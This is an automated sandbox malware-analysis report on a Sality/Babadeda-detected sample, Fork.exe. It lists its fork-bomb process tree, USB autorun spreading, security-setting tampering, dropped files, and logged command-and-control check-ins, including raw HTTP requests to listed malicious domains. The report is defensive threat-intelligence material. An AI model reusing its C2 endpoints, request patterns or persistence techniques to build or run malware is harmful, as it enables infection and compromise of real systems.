
Windows Analysis Report
Fork.exe

Overview

General Information

Sample name: Fork.exe
Analysis ID: 1640074
MD5: 63b6cebefec52083ac42eb8a39ab6683
SHA1: fb5be20e9327a66f05ff29b8458d0237c10ef7d6
SHA256: 6702fef486a9118c11cbd50a3d920950a3e239332b4e2edc7ae84bd3c8951191
Tags: exe, fork, forkbomb, sality, trojan, virus, user-2huMarisa

Detection

Babadeda
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Babadeda
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file has a writeable .text section
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • Fork.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\Fork.exe" MD5: 63B6CEBEFEC52083AC42EB8A39AB6683)
    • fontdrvhost.exe (PID: 768 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • cmd.exe (PID: 6196 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • calc.exe (PID: 6304 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6340 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6380 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6444 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6632 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6796 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 5412 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7172 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7256 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7416 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7432 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7620 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7644 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7652 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7660 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7668 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7676 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7684 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7696 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 8092 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 8172 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 8180 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7180 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6932 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6936 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6916 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7188 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7296 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7388 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7256 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7712 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6800 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6064 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
    • fontdrvhost.exe (PID: 764 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 980 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • Calculator.exe (PID: 2316 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)
  • cleanup
Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
No configs have been found
Source | Rule | Description | Author | Strings
Fork.exe | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
    Source | Rule | Description | Author | Strings
    C:\Users\user\AppData\Local\Temp\winrhbwc.exe | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen |
    • 0x14:$b1: yrf<[LordPE]
    • 0x210:$b2: Hello world!
    C:\doxt.pif | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen |
    • 0x14:$b1: yrf<[LordPE]
    • 0x210:$b2: Hello world!
    Source | Rule | Description | Author | Strings
    0.0.Fork.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |

      System Summary

      Source: Registry Key set, Author: frack113, Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Fork.exe, ProcessId: 7112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2025-03-16T23:04:30.443194+0100 | 2018141 | 1 | A Network Trojan was detected | 3.229.117.57 | 80 | 192.168.2.9 | 49683 | TCP
      2025-03-16T23:04:39.615704+0100 | 2037771 | 1 | A Network Trojan was detected | 3.229.117.57 | 80 | 192.168.2.9 | 49689 | TCP
      2025-03-16T23:04:30.442279+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49683 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:32.050016+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49684 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:33.069551+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49685 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:34.249537+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49686 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:36.427630+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49687 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:38.004184+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49688 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:39.615694+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49689 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:40.387921+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49690 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:42.547516+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49691 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:43.450009+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49692 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:44.221151+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49693 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:45.214955+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49694 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:46.797140+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49696 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:47.932507+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49698 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:50.169165+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49700 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:51.260540+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49704 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:54.378866+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49707 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:30.442279+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49683 | 3.229.117.57 | 80 | TCP
      2025-03-16T23:04:32.050016+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49684 | 3.229.117.57 | 80 | TCP


      AV Detection

      Source: Fork.exe | Avira: detected
      Source: http://arimaexim.com/logo.gif?3db8193=582454827 | Avira URL Cloud: Label: malware
      Source: http://arimaexim.com/logo.gif?1308dd2=179633250 | Avira URL Cloud: Label: malware
      Source: http://arimaexim.com/logo.gif?cb4dd6=106589872 | Avira URL Cloud: Label: malware
      Source: http://arimaexim.com/logo.gif?18828d2=179903934 | Avira URL Cloud: Label: malware
      Source: http://bhagavatirannade.org/logo.gif?175d7eb=196001624 | Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?1e72e91=159639765 | Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?47a8101=225411843 | Avira URL Cloud: Label: phishing
      Source: http://arimaexim.com/logo.gif?79b3d2=31903560 | Avira URL Cloud: Label: malware
      Source: http://bhagavatirannade.org/logo.gif?b2e175=46892500 | Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?2f2bdaf=494627030 | Avira URL Cloud: Label: phishing
      Source: http://arimaexim.com/logo.gif?3115e42=514698900 | Avira URL Cloud: Label: malware
      Source: http://bhagavatirannade.org/logo.gif?263b431=280620375 | Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?1113539=107429718 | Avira URL Cloud: Label: phishing
      Source: http://arimaexim.com/logo.gif?282bcc5=294857059 | Avira URL Cloud: Label: malware
      Source: http://bhagavatirannade.org/logo.gif?6b3a03=28108812 | Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?3925b70=239693248 | Avira URL Cloud: Label: phishing
      Source: http://arimaexim.com/logo.gif?2063744=237732572 | Avira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\winrhbwc.exe | Avira: detection malicious, Label: W32/Sality.AT
      Source: C:\doxt.pif | Avira: detection malicious, Label: W32/Sality.AT
      Source: Fork.exe | Virustotal: Detection: 85%
      Source: Fork.exe | ReversingLabs: Detection: 97%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: Fork.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

      Spreading

      Source: C:\Users\user\Desktop\Fork.exe | File created: C:\autorun.inf
      Source: C:\Users\user\Desktop\Fork.exe | File opened: x:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: w:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: v:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: u:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: t:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: s:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: r:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: q:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: p:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: o:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: n:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: m:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: l:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: k:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: j:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: i:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: h:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: g:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: f:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: e:
      Source: C:\Windows\System32\cmd.exe | File opened: c:
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.tmp
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\Local\
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\Local\Temp\6028.tmp
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp
      Source: C:\Users\user\Desktop\Fork.exe | File opened: C:\Users\user\

      Networking

      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49689 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49693 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49687 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49683 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49694 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49688 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49696 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49686 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49704 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49690 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49692 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49700 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49684 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49691 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49685 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49707 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49698 -> 3.229.117.57:80
      Source: global traffic | UDP traffic: 192.168.2.9:53030 -> 46.98.127.9:6759
      Source: Joe Sandbox View | IP Address: 3.229.117.57
      Source: Joe Sandbox View | IP Address: 46.98.127.9
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49683 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49684 -> 3.229.117.57:80
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.9:49689
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.9:49683
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?6b3a03=28108812 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?79b3d2=31903560 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: arimaexim.com
        Cache-Control: no-cache
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?b2e175=46892500 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162670|1742162670|0|1|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?cb4dd6=106589872 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: arimaexim.com
        Cache-Control: no-cache
        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162671|1742162671|0|1|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?1113539=107429718 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162673|1742162670|1|2|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?1308dd2=179633250 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: arimaexim.com
        Cache-Control: no-cache
        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162674|1742162671|1|2|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?175d7eb=196001624 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162676|1742162670|2|3|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?18828d2=179903934 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: arimaexim.com
        Cache-Control: no-cache
        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162677|1742162671|2|3|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?1e72e91=159639765 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162679|1742162670|2|4|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?2063744=237732572 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: arimaexim.com
        Cache-Control: no-cache
        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162680|1742162671|2|4|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?263b431=280620375 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162682|1742162670|2|5|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?282bcc5=294857059 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: arimaexim.com
        Cache-Control: no-cache
        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162683|1742162671|2|5|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?2f2bdaf=494627030 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162684|1742162670|2|6|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?3115e42=514698900 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: arimaexim.com
        Cache-Control: no-cache
        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162685|1742162671|2|6|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?3925b70=239693248 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162686|1742162670|2|7|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?3db8193=582454827 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: arimaexim.com
        Cache-Control: no-cache
        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162687|1742162671|2|7|0; snkz=8.46.123.189
      Source: global traffic | HTTP traffic detected:
        GET /logo.gif?47a8101=225411843 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
        Host: bhagavatirannade.org
        Cache-Control: no-cache
        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162690|1742162670|3|8|0; snkz=8.46.123.189
      Source: unknown | UDP traffic detected without corresponding DNS query: 46.98.127.9
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: businecessity.com
      Source: global trafficDNS traffic detected: DNS query: al-somow.com
      Source: global trafficDNS traffic detected: DNS query: amnisure.com.tr
      Source: global trafficDNS traffic detected: DNS query: bhagavatirannade.org
      Source: global trafficDNS traffic detected: DNS query: ankara-cambalkon.net
      Source: global trafficDNS traffic detected: DNS query: aocuoikhanhlinh.vn
      Source: global trafficDNS traffic detected: DNS query: yeni.antalyahilal.com
      Source: global trafficDNS traffic detected: DNS query: arimaexim.com
      Source: global trafficDNS traffic detected: DNS query: c.pki.goog
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abb.ind.in/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://abb.ind.in/logo.gifhttp://www.akpartisariveliler.com/images/img.gif4j14/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://al-somow.com/images/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amnisure.com.tr/images/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ankara-cambalkon.net/images/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aocuoikhanhlinh.vn/images/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arimaexim.com/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bhagavatirannade.org/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://businecessity.com/logo.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://businecessity.com/logo.gifhttp://al-somow.com/images/logo.gifhttp://amnisure.com.tr/images/lo
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.akpartisariveliler.com/images/img.gif
      Source: Fork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yeni.antalyahilal.com/logo.gif

      System Summary

      Source: C:\Users\user\AppData\Local\Temp\winrhbwc.exe, type: DROPPED | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
      Source: C:\doxt.pif, type: DROPPED | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
      Source: winrhbwc.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: doxt.pif.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Fork.exe, 00000000.00000000.963609984.0000000000418000.00000080.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFORKBOMB.exe2 vs Fork.exe
      Source: Fork.exe | Binary or memory string: OriginalFilenameFORKBOMB.exe2 vs Fork.exe
